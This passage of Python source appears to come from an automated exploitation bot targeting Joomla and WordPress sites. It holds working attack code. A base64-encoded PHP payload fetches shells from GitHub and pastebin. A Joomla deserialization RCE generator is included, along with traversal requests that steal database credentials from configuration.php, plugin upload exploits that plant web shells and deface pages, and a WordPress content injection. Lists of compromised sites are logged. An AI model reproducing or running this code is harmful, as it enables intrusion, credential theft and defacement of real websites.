LWm1Oc2IzTmxLQ1J2Y0dWdUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXlrcGV3MEtJQ0FnSUdWamFHOGdKR05vWldOckxpSThMMkp5UGlJN0RRcDlaV3h6WlNBTkNpQWdaV05vYnlBaWJtOTBJR1Y0YVhSeklqc05DbVZqYUc4Z0ltUnZibVVnTGx4dUlDSWdPdzBLSkdOb1pXTnJNaUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwybHRZV2RsY3k5MmRXeHVMbkJvY0NJZ093MEtKSFJsZUhReUlEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjbUYzTG1kcGRHaDFZblZ6WlhKamIyNTBaVzUwTG1OdmJTOHdOSGd2U1VOSExVRjFkRzlGZUhCc2IybDBaWEpDYjFRdmJXRnpkR1Z5TDJacGJHVnpMM1Z3TG5Cb2NDY3BPdzBLSkc5d1pXNHlJRDBnWm05d1pXNG9KR05vWldOck1pd2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQmxiaklzSUNSMFpYaDBNaWs3RFFwbVkyeHZjMlVvSkc5d1pXNHlLVHNOQ21sbUtHWnBiR1ZmWlhocGMzUnpLQ1JqYUdWamF6SXBLWHNOQ2lBZ0lDQmxZMmh2SUNSamFHVmphekl1SWp3dlluSStJanNOQ24xbGJITmxJQTBLSUNCbFkyaHZJQ0p1YjNRZ1pYaHBkSE15SWpzTkNtVmphRzhnSW1SdmJtVXlJQzVjYmlBaUlEc05DZzBLSkdOb1pXTnJNejBrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVWs5UFZDZGRJQzRnSWk5MmRXeHVMbWgwYlNJZ093MEtKSFJsZUhReklEMGdhSFIwY0Y5blpYUW9KMmgwZEhCek9pOHZjR0Z6ZEdWaWFXNHVZMjl0TDNKaGR5ODRPREIxWm1GWFJpY3BPdzBLSkc5d016MW1iM0JsYmlna1kyaGxZMnN6TENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RNc0pIUmxlSFF6S1RzTkNtWmpiRzl6WlNna2IzQXpLVHNOQ2cwS0RRb2tZMmhsWTJzMlBTUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMMmx0WVdkbGN5OTJkV3h1TG1oMGJTSWdPdzBLSkhSbGVIUTJJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQnpPaTh2Y0dGemRHVmlhVzR1WTI5dEwzSmhkeTg0T0RCMVptRlhSaWNwT3cwS0pHOXdOajFtYjNCbGJpZ2tZMmhsWTJzMkxDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEWXNKSFJsZUhRMktUc05DbVpqYkc5elpTZ2tiM0EyS1RzTkNqOCsnKSk7DQpmY2xvc2UoJGZwMik7DQo=')")
headers = {
'User-Agent': pl
}
try:
cookies = requests.get('http://' + site, headers=headers, timeout=5).cookies
except:
pass
try:
rr = requests.get('http://' + site + '/', headers=headers, cookies=cookies, timeout=5)
if rr:
requests.get('http://' + site + '/images/vuln2.php', timeout=5)
requests.get('http://' + site + '/tmp/vuln2.php', timeout=5)
ShellCheck = requests.get('http://' + site + '/images/vuln.php', timeout=5)
ShellCheck2 = requests.get('http://' + site + '/tmp/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text:
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write('http://' + site + '/images/vuln.php' + '\n')
IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
IndexCheck2 = requests.get('http://' + site + '/images/vuln.htm', timeout=5)
if 'Vuln!!' in IndexCheck.text:
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write('http://' + site + '/vuln.htm' + '\n')
elif 'Vuln!!' in IndexCheck2.text:
self.Print_Vuln_index(site + '/images/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write('http://' + site + '/images/vuln.htm' + '\n')
elif 'Vuln!!' in ShellCheck2.text:
self.Print_vuln_Shell(site + '/tmp/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write('http://' + site + '/tmp/vuln.php' + '\n')
IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
IndexCheck2 = requests.get('http://' + site + '/images/vuln.htm', timeout=5)
if 'Vuln!!' in IndexCheck.text:
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write('http://' + site + '/vuln.htm' + '\n')
elif 'Vuln!!' in IndexCheck2.text:
self.Print_Vuln_index(site + '/images/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write('http://' + site + '/images/vuln.htm' + '\n')
else:
self.Print_NotVuln('RCE Joomla', site)
else:
self.Print_NotVuln('RCE Joomla', site)
except:
self.Print_NotVuln('RCE Joomla', site)
except:
self.Print_NotVuln('RCE Joomla', site)
def php_str_noquotes(self, data):
try:
encoded = ""
for char in data:
encoded += "chr({0}).".format(ord(char))
return encoded[:-1]
except:
pass
def generate_payload(self, php_payload):
try:
php_payload = "eval({0})".format(php_payload)
terminate = '\xf0\xfd\xfd\xfd';
exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
return exploit_template
except:
pass
def Joomla_TakeADmin(self, site):
try:
GetVersion = requests.get('http://' + site + '/language/en-GB/en-GB.xml', timeout=5)
if 'version="3.' in GetVersion.text.encode('utf-8'):
os.system('python files/adminTakeover.py -u MArKAntoni -p MArKAntoni -e ' +
self.EMail + ' http://' + site)
except:
self.Print_NotVuln('Maybe Add Admin 3.x', site)
def Com_s5_media_player(self, site):
try:
Exp = 'http://' + site + \
'/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA='
GetConfig = requests.get(Exp, timeout=5)
if 'JConfig' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
except:
pass
else:
self.Print_NotVuln('Com_s5_media_player', site)
except:
self.Print_NotVuln('Com_s5_media_player', site)
def Com_Hdflvplayer(self, site):
try:
Exp = 'http://' + site + \
'/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php'
GetConfig = requests.get(Exp, timeout=5)
if 'JConfig' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
except:
pass
else:
self.Print_NotVuln('Com_Hdflvplayer', site)
except:
self.Print_NotVuln('Com_Hdflvplayer', site)
def Com_Joomanager(self, site):
try:
Exp = 'http://' + site + \
'/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php'
GetConfig = requests.get(Exp, timeout=5)
if 'JConfig' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
except:
self.Print_NotVuln('Com_Joomanager', site)
else:
self.Print_NotVuln('Com_Joomanager', site)
except:
self.Print_NotVuln('Com_Joomanager', site)
def Com_Macgallery(self, site):
try:
Exp = 'http://' + site + '/index.php?option=com_macgallery&view=download&albumid=../../configuration.php'
GetConfig = requests.get(Exp, timeout=5)
if 'JConfig' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
0] + '\n---------------------\n')
except:
self.Print_NotVuln('Com_Macgallery', site)
else:
self.Print_NotVuln('Com_Macgallery', site)
except:
self.Print_NotVuln('Com_Macgallery', site)
def Com_CCkJseblod(self, site):
try:
Exp = 'http://' + site + '/index.php?option=com_cckjseblod&task=download&file=configuration.php'
GetConfig = requests.get(Exp, timeout=5)
if 'JConfig' in GetConfig.text.encode('utf-8'):
self.Print_vuln_Config(site)
with open('result/Config_results.txt', 'a') as ww:
ww.write('Full Config Path : ' + Exp + '\n')
try:
Gethost = re.findall("host = '(.*)';", GetConfig.text.encode('utf-8'))
Getuser = re.findall("user = '(.*)';", GetConfig.text.encode('utf-8'))
Getpass = re.findall("password = '(.*)';", GetConfig.text.encode('utf-8'))
Getdb = re.findall("db = '(.*)';", GetConfig.text.encode('utf-8'))
with open('result/Config_results.txt', 'a') as ww:
ww.write(' Host: ' + Gethost[1] + '\n' + ' user: ' + Getuser[1] +
'\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[0] + '\n---------------------\n')
except:
self.Print_NotVuln('Com_CCkjseblod', site)
else:
self.Print_NotVuln('Com_CCkjseblod', site)
except:
self.Print_NotVuln('Com_CCkjseblod', site)
def Com_MyBlog(self, site):
try:
fileindex = {'fileToUpload': open(self.Jce_Deface_image, 'rb')}
Exp = 'http://' + site + '/index.php?option=com_myblog&task=ajaxupload'
GoT = requests.post(Exp, files=fileindex, timeout=5)
if 'success' or 'File exists' in GoT.text.encode('utf-8'):
if '/images/pwn' in GoT.text.encode('utf-8'):
IndeXpath = 'http://' + site + '/images/pwn.gif'
else:
try:
GetPAth = re.findall("source: '(.*)'", GoT.text.encode('utf-8'))
IndeXpath = GetPAth[0]
except:
IndeXpath = 'http://' + site + '/images/pwn.gif'
CheckIndex = requests.get(IndeXpath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/images/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndeXpath + '\n')
else:
self.Print_NotVuln('Com_MyBlog', site)
else:
self.Print_NotVuln('Com_MyBlog', site)
except:
self.Print_NotVuln('Com_MyBlog', site)
def Com_Jdownloads_shell(self, site):
try:
fileindex = {'file_upload': (self.ZipJd, open(self.ZipJd, 'rb'), 'multipart/form-data'),
'pic_upload': (self.jdShell, open(self.jdShell, 'rb'), 'multipart/form-data')}
post_data = {
'name': 'ur name',
'mail': 'TTTntsfT@aa.com',
'catlist': '1',
'filetitle': "lolz",
'description': "<p>zot</p>",
'2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
'send': 1,
'senden': "Send file",
'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
'option': "com_jdownloads",
'view': "upload"
}
Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
Got = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
if '/upload_ok.png' in Got.text.encode('utf-8'):
checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + self.jdShell.split('/')[1]
Check = requests.get(checkUrl, timeout=5)
if 'Vuln!!' in Check.text:
ChecksHell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in ChecksHell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Com_Jdownloads(site)
else:
self.Com_Jdownloads(site)
else:
self.Com_Jdownloads(site)
except:
self.Com_Jdownloads(site)
def Com_Jdownloads(self, site):
try:
fileindex = {'file_upload': (self.ZipJd, open(self.ZipJd, 'rb'),'multipart/form-data'),
'pic_upload': (self.Jce_Deface_image, open(self.Jce_Deface_image, 'rb'), 'multipart/form-data')}
post_data = {
'name': 'ur name',
'mail': 'TTTnstT@aa.com',
'catlist': '1',
'filetitle': "lolz",
'description': "<p>zot</p>",
'2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
'send': 1,
'senden': "Send file",
'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
'option': "com_jdownloads",
'view': "upload"
}
Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
Got = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
if '/upload_ok.png' in Got.text.encode('utf-8'):
checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + self.Jce_Deface_image.split('/')[1]
Check = requests.get(checkUrl, timeout=5)
if 'GIF89a' in Check.text:
self.Print_Vuln_index(site + '/images/jdownloads/screenshots/' +
self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(checkUrl + '\n')
else:
self.Print_NotVuln('Com_Jdownloads', site)
else:
self.Print_NotVuln('Com_Jdownloads', site)
except:
self.Print_NotVuln('Com_Jdownloads', site)
def Com_Fabric(self, site):
try:
fileindex = {'userfile': (self.TextindeX, open(self.TextindeX, 'rb'), 'multipart/form-data')}
post_data = {
"name": "me.php",
"drop_data": "1",
"overwrite": "1",
"field_delimiter": ",",
"text_delimiter": """,
"option": "com_fabrik",
"controller": "import",
"view": "import",
"task": "doimport",
"Itemid": "0",
"tableid": "0"
}
Exp = 'http://' + site + "/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table="
requests.post(Exp, files=fileindex, data=post_data, timeout=5)
Check = requests.get('http://' + site + '/media/' + self.TextindeX.split('/')[1])
if 'Vuln!!' in Check.text:
self.Print_Vuln_index(site + '/media/' + self.TextindeX.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/media/' + self.TextindeX.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_Fabric', site)
except:
self.Print_NotVuln('Com_Fabric', site)
def Com_AdsManager(self, site):
try:
fileindex = {'file': open(self.Jce_Deface_image, 'rb')}
post_data = {"name": self.Jce_Deface_image.split('/')[1]}
Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
if '"jsonrpc"' in GoT.text.encode('utf-8'):
Check = requests.get('http://' + site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1], timeout=5)
if 'GIF89a' in Check.text.encode('utf-8'):
self.Print_Vuln_index(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/tmp/plupload/' + self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_AdsManager', site)
except:
self.Print_NotVuln('Com_AdsManager', site)
def Com_AdsManager_Shell(self, site):
try:
fileindex = {'file': open(self.indeX, 'rb')}
post_data = {"name": "vuln.php"}
Exp = 'http://' + site + "/index.php?option=com_adsmanager&task=upload&tmpl=component"
GoT = requests.post(Exp, files=fileindex, data=post_data, timeout=5)
if '"jsonrpc"' in GoT.text.encode('utf-8'):
requests.post(Exp, files=fileindex, data={"name": "vuln.phP"}, timeout=5)
requests.post(Exp, files=fileindex, data={"name": "vuln.phtml"}, timeout=5)
Check = requests.get('http://' + site + '/tmp/plupload/vuln.php', timeout=5)
Check2 = requests.get('http://' + site + '/tmp/plupload/vuln.phP', timeout=5)
Check3 = requests.get('http://' + site + '/tmp/plupload/vuln.phtml', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
CheckShell = requests.get('http://' + site + '/images/vuln.php', timeout=5)
if 'Vuln!!' in Check.text.encode('utf-8'):
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Com_AdsManager(site)
elif 'Vuln!!' in Check2.text.encode('utf-8'):
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Com_AdsManager(site)
elif 'Vuln!!' in Check3.text.encode('utf-8'):
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Com_AdsManager(site)
else:
self.Com_AdsManager(site)
except:
self.Com_AdsManager(site)
def JCE_shell(self, site):
try:
fileShell = {'Filedata': open(self._shell, 'rb')}
post_data = {'upload-dir': '/', 'upload-overwrite': '0', 'action': 'upload'}
Exp = 'http://' + site +\
'/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form'
Post = requests.post(Exp, files=fileShell, data=post_data, timeout=5)
OtherMethod = '"text":"' + self._shell.split('/')[1] + '"'
if OtherMethod in Post.text.encode('utf-8'):
PrivMethod = {'json': "{\"fn\":\"folderRename\",\"args\":[\"/" + self._shell.split('/')[1]
+ "\",\"./../../images/vuln.php\"]}"}
try:
privExploit = 'http://' + site + '/index.php?option=com_jce&task=' \
'plugin&plugin=imgmanager&file=imgmanager&version=156&format=raw'
requests.post(privExploit, data=PrivMethod, timeout=5)
try:
VulnCheck = requests.get('http://' + site + '/images/vuln.php', timeout=5)
if 'Vuln!!' in VulnCheck.text:
self.Print_vuln_Shell(site + '/images/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/images/vuln.php' + '\n')
self.Jce_Test(site)
else:
self.Jce_Test(site)
except:
self.Jce_Test(site)
except:
self.Jce_Test(site)
else:
self.Jce_Test(site)
except:
self.Jce_Test(site)
def Jce_Test(self, site):
try:
fileDeface = {'Filedata': open(self.Jce_Deface_image, 'rb')}
post_data = {'upload-dir': '../../', 'upload-overwrite': '0', 'action': 'upload'}
Exp = 'http://' + site +\
'/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form'
Post = requests.post(Exp, files=fileDeface, data=post_data, timeout=5)
OtherMethod = '"text":"' + self.Jce_Deface_image.split('/')[1] + '"'
if OtherMethod in Post.text.encode('utf-8'):
self.Print_Vuln_index(site + '/' + self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/' + self.Jce_Deface_image.split('/')[1] + '\n')
elif OtherMethod not in Post.text.encode('utf-8'):
post_data2 = {'upload-dir': '../', 'upload-overwrite': '0', 'action': 'upload'}
Post = requests.post(Exp, files=fileDeface, data=post_data2, timeout=5)
if OtherMethod in Post.text.encode('utf-8'):
self.Print_Vuln_index(site + '/images/' + self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/images/' + self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Com_JCE', site)
else:
self.Print_NotVuln('Com_JCE', site)
except:
self.Print_NotVuln('Com_JCE', site)
def alberghiExploit(self, site):
try:
fileDeface = {'userfile': open(self.Jce_Deface_image, 'rb')}
Exp = 'http://' + site + '/administrator/components/com_alberghi/upload.alberghi.php'
Check = requests.get(Exp, timeout=5)
if 'class="inputbox" name="userfile"' in Check.text.encode('utf-8'):
Post = requests.post(Exp, files=fileDeface, timeout=5)
if 'has been successfully' or 'already exists' in Post.text.encode('utf-8'):
CheckIndex = requests.get(site + '/administrator/components/com_alberghi/' +
self.Jce_Deface_image.split('/')[1], timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/administrator/components/com_alberghi/' +
self.Jce_Deface_image.split('/')[1] + '\n')
self.Print_Vuln_index(site + '/administrator/components/com_alberghi/' +
self.Jce_Deface_image.split('/')[1])
else:
self.Print_NotVuln('com_alberghi', site)
else:
self.Print_NotVuln('com_alberghi', site)
else:
self.Print_NotVuln('com_alberghi', site)
except:
self.Print_NotVuln('com_alberghi', site)
def CateGory_page_icons(self, site):
try:
ChckVln = requests.get('http://' + site + '/wp-content/plugins/category-page-icons/css/menu.css', timeout=5)
if ChckVln.status_code == 200:
Exp = 'http://' + site + '/wp-content/plugins/category-page-icons/include/wpdev-flash-uploader.php'
fileDeface = {'wpdev-async-upload': open(self.Jce_Deface_image, 'rb')}
PostDAta = {'dir_icons': '../../../',
'submit': 'upload'}
requests.post(Exp, files=fileDeface, data=PostDAta, timeout=5)
CheckIndex = requests.get('http://' + site + '/wp-content/' + self.Jce_Deface_image.split('/')[1], timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/' + self.Jce_Deface_image.split('/')[1] + '\n')
self.Print_Vuln_index(site + '/wp-content/' + self.Jce_Deface_image.split('/')[1])
else:
self.Print_NotVuln('CateGory_page_icons', site)
else:
self.Print_NotVuln('CateGory_page_icons', site)
except:
self.Print_NotVuln('CateGory_page_icons', site)
def Downloads_Manager(self, site):
try:
Checkvuln = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/img/unlock.gif', timeout=5)
if 'GIF89a' in Checkvuln.text.encode('utf-8'):
PostDAta = {'dm_upload': ''}
fileDeface = {'upfile': open(self.Jce_Deface_image, 'rb')}
fileShell = {'upfile': open(self.pagelinesExploitShell, 'rb')}
requests.post('http://' + site, data=PostDAta, files=fileDeface, timeout=5)
CheckIndex = requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
self.Jce_Deface_image.split('/')[1])
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
requests.post('http://' + site, data=PostDAta, files=fileShell, timeout=5)
requests.get('http://' + site + '/wp-content/plugins/downloads-manager/upload/' +
self.pagelinesExploitShell.split('/')[1], timeout=5)
CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/plugins/downloads-manager/upload/' +
self.pagelinesExploitShell.split('/')[1])
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
self.pagelinesExploitShell.split('/')[1] + '\n')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_Vuln_index(site + '/wp-content/plugins/downloads-manager/upload/' +
self.Jce_Deface_image.split('/')[1])
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/plugins/downloads-manager/upload/' +
self.Jce_Deface_image.split('/')[1] + '\n')
else:
self.Print_NotVuln('Downloads-Manager', site)
else:
self.Print_NotVuln('Downloads-Manager', site)
except:
self.Print_NotVuln('Downloads-Manager', site)
def GetWordpressPostId(self, zzz):
try:
PostId = requests.get('http://' + zzz + '/wp-json/wp/v2/posts/', timeout=5)
wsx = re.findall('"id":(.+?),"date"', PostId.text)
postid = wsx[1].strip()
return postid
except:
pass
def wp_content_injection(self, site):
try:
zaq = self.GetWordpressPostId(site)
headers = {'Content-Type': 'application/json'}
xxx = str(zaq) + 'bbx'
data = json.dumps({
'content': '<h1>Vuln!! Path it now!!\n<p><title>Vuln!! Path it now!!<br />\n</title></p></h1>\n',
'title': 'Vuln!! Path it now!!',
'id': xxx,
'link': '/x-htm/',
'slug': '"/x-htm/"'
})
GoT = requests.post('http://' + site + '/wp-json/wp/v2/posts/' + str(zaq), data=data, headers=headers, timeout=10)
if GoT:
CheckIndex = 'http://' + site + '/x.htm'
zcheck = requests.get(CheckIndex, timeout=10)
if 'Vuln!!' in zcheck.text:
self.Print_Vuln_index(site + '/x.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/x.htm' + '\n')
else:
self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
else:
self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
except:
self.Print_NotVuln('Wordpress 4.7 Content Injection', site)
def Wp_Job_Manager(self, site):
try:
Exploit = '/jm-ajax/upload_file/'
CheckVuln = requests.get('http://' + site + Exploit, timeout=5)
if '"files":[]' in CheckVuln.text.encode('utf-8'):
try:
IndeXfile = {'file[]': open(self.Jce_Deface_image, 'rb')}
GoT = requests.post('http://' + site + Exploit, files=IndeXfile, timeout=5)
GetIndeXpath = re.findall('"url":"(.*)"', GoT.text.encode('utf-8'))
IndeXpath = GetIndeXpath[0].split('"')[0].replace('\/', '/').split('/wp-content')[1]
UploadedIndEX = site + '/wp-content' + IndeXpath
Checkindex = requests.get('http://' + UploadedIndEX, timeout=5)
if 'GIF89a' in Checkindex.text.encode('utf-8'):
self.Print_Vuln_index(UploadedIndEX)
with open('result/Index_results.txt', 'a') as writer:
writer.write(UploadedIndEX + '\n')
else:
self.Print_NotVuln('Wp-Job-Manager', site)
except:
self.Print_NotVuln('Wp-Job-Manager', site)
else:
self.Print_NotVuln('Wp-Job-Manager', site)
except:
self.Print_NotVuln('Wp-Job-Manager', site)
def wp_mobile_detector(self, site):
try:
ExploitShell = '/wp-content/plugins/wp-mobile-detector/resize.php?src=' \
'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/settings_auto.php'
ExploitGifUpload = '/wp-content/plugins/wp-mobile-detector/resize.php?src=' \
'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/pwn.gif'
Ex = '/wp-content/plugins/wp-mobile-detector/resize.php'
GoT = requests.get('http://' + site + Ex, timeout=5)
if 'GIF89a' in GoT.text.encode('utf-8'):
requests.get('http://' + site + ExploitGifUpload)
requests.get('http://' + site + ExploitShell)
PathGif = '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif'
PathShell = '/wp-content/plugins/wp-mobile-detector/cache/settings_auto.php'
Check1 = 'http://' + site + PathGif
Check2 = 'http://' + site + PathShell
CheckIndex = requests.get(Check1, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
CheckShell = requests.get(Check2, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
Xshell = requests.get("http://" + site + "/wp-content/vuln.php", timeout=5)
if 'Vuln!!' in Xshell.text.encode('utf-8'):
self.Print_vuln_Shell(site + "/wp-content/vuln.php")
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + "/wp-content/vuln.php" + '\n')
Xindex = requests.get("http://" + site + "/vuln.htm", timeout=5)
if 'Vuln!!' in Xindex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_Vuln_index(site + '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/plugins/wp-mobile-detector/cache/pwn.gif' + '\n')
else:
self.Print_NotVuln('wp-mobile-detector', site)
else:
